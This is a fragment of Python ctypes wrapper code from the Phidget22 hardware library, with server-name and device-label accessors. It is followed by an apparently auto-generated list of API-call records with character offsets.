_ServerHostname = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getServerHostname
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ServerHostname))
if result > 0:
raise PhidgetException(result)
return _ServerHostname.value.decode('utf-8')
def getServerName(self):
_ServerName = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getServerName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ServerName))
if result > 0:
raise PhidgetException(result)
return _ServerName.value.decode('utf-8')
def setServerName(self, ServerName):
_ServerName = ctypes.create_string_buffer(ServerName.encode('utf-8'))
__func = PhidgetSupport.getDll().Phidget_setServerName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ServerName))
if result > 0:
raise PhidgetException(result)
def getServerPeerName(self):
_ServerPeerName = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getServerPeerName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ServerPeerName))
if result > 0:
raise PhidgetException(result)
return _ServerPeerName.value.decode('utf-8')
def getServerUniqueName(self):
_ServerUniqueName = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getServerUniqueName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ServerUniqueName))
if result > 0:
raise PhidgetException(result)
return _ServerUniqueName.value.decode('utf-8')
def getMaxVINTDeviceSpeed(self):
_MaxVINTDeviceSpeed = ctypes.c_uint32()
__func = PhidgetSupport.getDll().Phidget_getMaxVINTDeviceSpeed
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_MaxVINTDeviceSpeed))
if result > 0:
raise PhidgetException(result)
return _MaxVINTDeviceSpeed.value
def getVINTDeviceSupportsSetSpeed(self):
_VINTDeviceSupportsSetSpeed = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getVINTDeviceSupportsSetSpeed
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_VINTDeviceSupportsSetSpeed))
if result > 0:
raise PhidgetException(result)
return _VINTDeviceSupportsSetSpeed.value
def writeDeviceLabel(self, deviceLabel):
_deviceLabel = ctypes.create_string_buffer(deviceLabel.encode('utf-8'))
__func = PhidgetSupport.getDll().Phidget_writeDeviceLabel
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_deviceLabel))
if result > 0:
raise PhidgetException(result)
ANY_SERIAL_NUMBER = -1
ANY_HUB_PORT = -1
ANY_CHANNEL = -1
ANY_LABEL = None
INFINITE_TIMEOUT = 0
DEFAULT_TIMEOUT = 1000
| [
"ctypes.CFUNCTYPE",
"ctypes.c_uint32",
"ctypes.byref",
"ctypes.c_int32",
"Phidget22.PhidgetSupport.PhidgetSupport.getDll",
"Phidget22.PhidgetException.PhidgetException",
"ctypes.WINFUNCTYPE",
"ctypes.c_int",
"ctypes.c_void_p",
"ctypes.c_char_p"
] | [((457, 474), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\n', (472, 474), False, 'import ctypes\n'), ((1830, 1851), 'ctypes.c_int32', 'ctypes.c_int32', (['(65536)'], {}), '(65536)\n', (1844, 1851), False, 'import ctypes\n'), ((4772, 4793), 'ctypes.c_int32', 'ctypes.c_int32', (['flags'], {}), '(flags)\n', (4786, 4793), False, 'import ctypes\n'), ((5022, 5039), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (5037, 5039), False, 'import ctypes\n'), ((5359, 5376), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (5374, 5376), False, 'import ctypes\n'), ((5879, 5893), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (5891, 5893), False, 'import ctypes\n'), ((6155, 6169), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (6167, 6169), False, 'import ctypes\n'), ((6437, 6458), 'ctypes.c_int', 'ctypes.c_int', (['Channel'], {}), '(Channel)\n', (6449, 6458), False, 'import ctypes\n'), ((6689, 6703), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (6701, 6703), False, 'import ctypes\n'), ((6995, 7012), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (7010, 7012), False, 'import ctypes\n'), ((7322, 7339), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (7337, 7339), False, 'import ctypes\n'), ((7642, 7656), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (7654, 7656), False, 'import ctypes\n'), ((8137, 8154), 'ctypes.c_int', 'ctypes.c_int', (['cls'], {}), '(cls)\n', (8149, 8154), False, 'import ctypes\n'), ((8166, 8183), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (8181, 8183), False, 'import ctypes\n'), ((8463, 8477), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (8475, 8477), False, 'import ctypes\n'), ((8764, 8781), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (8779, 8781), False, 'import ctypes\n'), ((9082, 9096), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (9094, 9096), False, 'import ctypes\n'), ((9366, 9383), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (9381, 9383), False, 'import ctypes\n'), ((9996, 10013), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (10011, 10013), False, 'import ctypes\n'), ((10319, 10335), 'ctypes.c_int32', 'ctypes.c_int32', ([], {}), '()\n', (10333, 10335), False, 'import ctypes\n'), ((10669, 10703), 'ctypes.c_int32', 'ctypes.c_int32', (['DeviceSerialNumber'], {}), '(DeviceSerialNumber)\n', (10683, 10703), False, 'import ctypes\n'), ((10950, 10967), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (10965, 10967), False, 'import ctypes\n'), ((11260, 11274), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (11272, 11274), False, 'import ctypes\n'), ((11543, 11560), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\n', (11558, 11560), False, 'import ctypes\n'), ((11844, 11858), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (11856, 11858), False, 'import ctypes\n'), ((12126, 12147), 'ctypes.c_int', 'ctypes.c_int', (['HubPort'], {}), '(HubPort)\n', (12138, 12147), False, 'import ctypes\n'), ((12378, 12392), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (12390, 12392), False, 'import ctypes\n'), ((12676, 12693), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (12691, 12693), False, 'import ctypes\n'), ((12991, 13020), 'ctypes.c_uint32', 'ctypes.c_uint32', (['HubPortSpeed'], {}), '(HubPortSpeed)\n', (13006, 13020), False, 'import ctypes\n'), ((13267, 13284), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (13282, 13284), False, 'import ctypes\n'), ((13599, 13613), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (13611, 13613), False, 'import ctypes\n'), ((13924, 13938), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (13936, 13938), False, 'import ctypes\n'), ((14219, 14233), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (14231, 14233), False, 'import ctypes\n'), ((14549, 14578), 'ctypes.c_int', 'ctypes.c_int', (['IsHubPortDevice'], {}), '(IsHubPortDevice)\n', (14561, 14578), False, 'import ctypes\n'), ((14815, 14829), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (14827, 14829), False, 'import ctypes\n'), ((15097, 15118), 'ctypes.c_int', 'ctypes.c_int', (['IsLocal'], {}), '(IsLocal)\n', (15109, 15118), False, 'import ctypes\n'), ((15341, 15355), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (15353, 15355), False, 'import ctypes\n'), ((15629, 15651), 'ctypes.c_int', 'ctypes.c_int', (['IsRemote'], {}), '(IsRemote)\n', (15641, 15651), False, 'import ctypes\n'), ((16078, 16102), 'ctypes.c_uint32', 'ctypes.c_uint32', (['timeout'], {}), '(timeout)\n', (16093, 16102), False, 'import ctypes\n'), ((16332, 16349), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\n', (16347, 16349), False, 'import ctypes\n'), ((16665, 16682), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (16680, 16682), False, 'import ctypes\n'), ((16984, 17001), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (16999, 17001), False, 'import ctypes\n'), ((17613, 17630), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (17628, 17630), False, 'import ctypes\n'), ((17944, 17961), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (17959, 17961), False, 'import ctypes\n'), ((18285, 18302), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (18300, 18302), False, 'import ctypes\n'), ((18632, 18646), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (18644, 18646), False, 'import ctypes\n'), ((531, 589), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (549, 589), False, 'import ctypes\n'), ((623, 679), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (639, 679), False, 'import ctypes\n'), ((782, 840), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (800, 840), False, 'import ctypes\n'), ((874, 930), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (890, 930), False, 'import ctypes\n'), ((1032, 1125), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_int', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int,\n ctypes.c_char_p)\n', (1050, 1125), False, 'import ctypes\n'), ((1154, 1245), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_int', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int,\n ctypes.c_char_p)\n', (1170, 1245), False, 'import ctypes\n'), ((1350, 1425), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)\n', (1368, 1425), False, 'import ctypes\n'), ((1467, 1540), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)\n', (1483, 1540), False, 'import ctypes\n'), ((2012, 2032), 'ctypes.byref', 'ctypes.byref', (['_value'], {}), '(_value)\n', (2024, 2032), False, 'import ctypes\n'), ((2116, 2139), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (2137, 2139), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((2204, 2229), 'ctypes.byref', 'ctypes.byref', (['self.handle'], {}), '(self.handle)\n', (2216, 2229), False, 'import ctypes\n'), ((2275, 2296), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['res'], {}), '(res)\n', (2291, 2296), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((4806, 4829), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (4827, 4829), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((4934, 4958), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (4950, 4958), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5052, 5075), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5073, 5075), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((5154, 5183), 'ctypes.byref', 'ctypes.byref', (['_LibraryVersion'], {}), '(_LibraryVersion)\n', (5166, 5183), False, 'import ctypes\n'), ((5212, 5236), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (5228, 5236), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5389, 5412), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5410, 5412), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((5497, 5532), 'ctypes.byref', 'ctypes.byref', (['_LibraryVersionNumber'], {}), '(_LibraryVersionNumber)\n', (5509, 5532), False, 'import ctypes\n'), ((5561, 5585), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (5577, 5585), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5688, 5711), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5709, 5711), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((5814, 5838), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (5830, 5838), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5906, 5929), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5927, 5929), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6015, 6038), 'ctypes.byref', 'ctypes.byref', (['_Attached'], {}), '(_Attached)\n', (6027, 6038), False, 'import ctypes\n'), ((6067, 6091), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6083, 6091), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((6182, 6205), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (6203, 6205), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6290, 6312), 'ctypes.byref', 'ctypes.byref', (['_Channel'], {}), '(_Channel)\n', (6302, 6312), False, 'import ctypes\n'), ((6341, 6365), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6357, 6365), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((6471, 6494), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (6492, 6494), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6616, 6640), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6632, 6640), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((6716, 6739), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (6737, 6739), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6829, 6856), 'ctypes.byref', 'ctypes.byref', (['_ChannelClass'], {}), '(_ChannelClass)\n', (6841, 6856), False, 'import ctypes\n'), ((6885, 6909), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6901, 6909), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7025, 7048), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7046, 7048), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((7142, 7173), 'ctypes.byref', 'ctypes.byref', (['_ChannelClassName'], {}), '(_ChannelClassName)\n', (7154, 7173), False, 'import ctypes\n'), ((7202, 7226), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (7218, 7226), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7352, 7375), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7373, 7375), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((7464, 7490), 'ctypes.byref', 'ctypes.byref', (['_ChannelName'], {}), '(_ChannelName)\n', (7476, 7490), False, 'import ctypes\n'), ((7519, 7543), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (7535, 7543), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7669, 7692), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7690, 7692), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((7785, 7815), 'ctypes.byref', 'ctypes.byref', (['_ChannelSubclass'], {}), '(_ChannelSubclass)\n', (7797, 7815), False, 'import ctypes\n'), ((7844, 7868), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (7860, 7868), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7932, 7955), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7953, 7955), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8062, 8086), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8078, 8086), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((8196, 8219), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (8217, 8219), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8321, 8341), 'ctypes.byref', 'ctypes.byref', (['_count'], {}), '(_count)\n', (8333, 8341), False, 'import ctypes\n'), ((8370, 8394), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8386, 8394), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((8490, 8513), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (8511, 8513), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8602, 8628), 'ctypes.byref', 'ctypes.byref', (['_DeviceClass'], {}), '(_DeviceClass)\n', (8614, 8628), False, 'import ctypes\n'), ((8657, 8681), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8673, 8681), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((8794, 8817), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (8815, 8817), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8910, 8940), 'ctypes.byref', 'ctypes.byref', (['_DeviceClassName'], {}), '(_DeviceClassName)\n', (8922, 8940), False, 'import ctypes\n'), ((8969, 8993), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8985, 8993), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((9109, 9132), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (9130, 9132), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((9218, 9241), 'ctypes.byref', 'ctypes.byref', (['_DeviceID'], {}), '(_DeviceID)\n', (9230, 9241), False, 'import ctypes\n'), ((9270, 9294), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (9286, 9294), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((9396, 9419), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (9417, 9419), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((9508, 9534), 'ctypes.byref', 'ctypes.byref', (['_DeviceLabel'], {}), '(_DeviceLabel)\n', (9520, 9534), False, 'import ctypes\n'), ((9563, 9587), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (9579, 9587), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((9760, 9783), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (9781, 9783), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((9872, 9898), 'ctypes.byref', 'ctypes.byref', (['_DeviceLabel'], {}), '(_DeviceLabel)\n', (9884, 9898), False, 'import ctypes\n'), ((9927, 9951), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (9943, 9951), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10026, 10049), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (10047, 10049), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((10137, 10162), 'ctypes.byref', 'ctypes.byref', (['_DeviceName'], {}), '(_DeviceName)\n', (10149, 10162), False, 'import ctypes\n'), ((10191, 10215), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (10207, 10215), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10348, 10371), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (10369, 10371), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((10467, 10500), 'ctypes.byref', 'ctypes.byref', (['_DeviceSerialNumber'], {}), '(_DeviceSerialNumber)\n', (10479, 10500), False, 'import ctypes\n'), ((10529, 10553), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (10545, 10553), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10716, 10739), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (10737, 10739), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((10883, 10907), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (10899, 10907), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10980, 11003), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11001, 11003), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11090, 11114), 'ctypes.byref', 'ctypes.byref', (['_DeviceSKU'], {}), '(_DeviceSKU)\n', (11102, 11114), False, 'import ctypes\n'), ((11143, 11167), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (11159, 11167), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((11287, 11310), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11308, 11310), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11401, 11429), 'ctypes.byref', 'ctypes.byref', (['_DeviceVersion'], {}), '(_DeviceVersion)\n', (11413, 11429), False, 'import ctypes\n'), ((11458, 11482), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (11474, 11482), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((11573, 11596), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11594, 11596), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11677, 11695), 'ctypes.byref', 'ctypes.byref', (['_Hub'], {}), '(_Hub)\n', (11689, 11695), False, 'import ctypes\n'), ((11724, 11748), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (11740, 11748), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((11871, 11894), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11892, 11894), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11979, 12001), 'ctypes.byref', 'ctypes.byref', (['_HubPort'], {}), '(_HubPort)\n', (11991, 12001), False, 'import ctypes\n'), ((12030, 12054), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12046, 12054), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((12160, 12183), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (12181, 12183), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((12305, 12329), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12321, 12329), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((12405, 12428), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (12426, 12428), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((12518, 12545), 'ctypes.byref', 'ctypes.byref', (['_HubPortCount'], {}), '(_HubPortCount)\n', (12530, 12545), False, 'import ctypes\n'), ((12574, 12598), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12590, 12598), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((12706, 12729), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (12727, 12729), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((12819, 12846), 'ctypes.byref', 'ctypes.byref', (['_HubPortSpeed'], {}), '(_HubPortSpeed)\n', (12831, 12846), False, 'import ctypes\n'), ((12875, 12899), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12891, 12899), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13033, 13056), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13054, 13056), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((13188, 13212), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (13204, 13212), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13297, 13320), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13318, 13320), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((13413, 13443), 'ctypes.byref', 'ctypes.byref', (['_MaxHubPortSpeed'], {}), '(_MaxHubPortSpeed)\n', (13425, 13443), False, 'import ctypes\n'), ((13472, 13496), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (13488, 13496), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13626, 13649), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13647, 13649), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((13750, 13788), 'ctypes.byref', 'ctypes.byref', (['_HubPortSupportsSetSpeed'], {}), '(_HubPortSupportsSetSpeed)\n', (13762, 13788), False, 'import ctypes\n'), ((13817, 13841), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (13833, 13841), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13951, 13974), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13972, 13974), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14061, 14085), 'ctypes.byref', 'ctypes.byref', (['_IsChannel'], {}), '(_IsChannel)\n', (14073, 14085), False, 'import ctypes\n'), ((14114, 14138), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (14130, 14138), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((14246, 14269), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (14267, 14269), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14362, 14392), 'ctypes.byref', 'ctypes.byref', (['_IsHubPortDevice'], {}), '(_IsHubPortDevice)\n', (14374, 14392), False, 'import ctypes\n'), ((14421, 14445), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (14437, 14445), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((14591, 14614), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (14612, 14614), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14752, 14776), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (14768, 14776), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((14842, 14865), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (14863, 14865), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14950, 14972), 'ctypes.byref', 'ctypes.byref', (['_IsLocal'], {}), '(_IsLocal)\n', (14962, 14972), False, 'import ctypes\n'), ((15001, 15025), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15017, 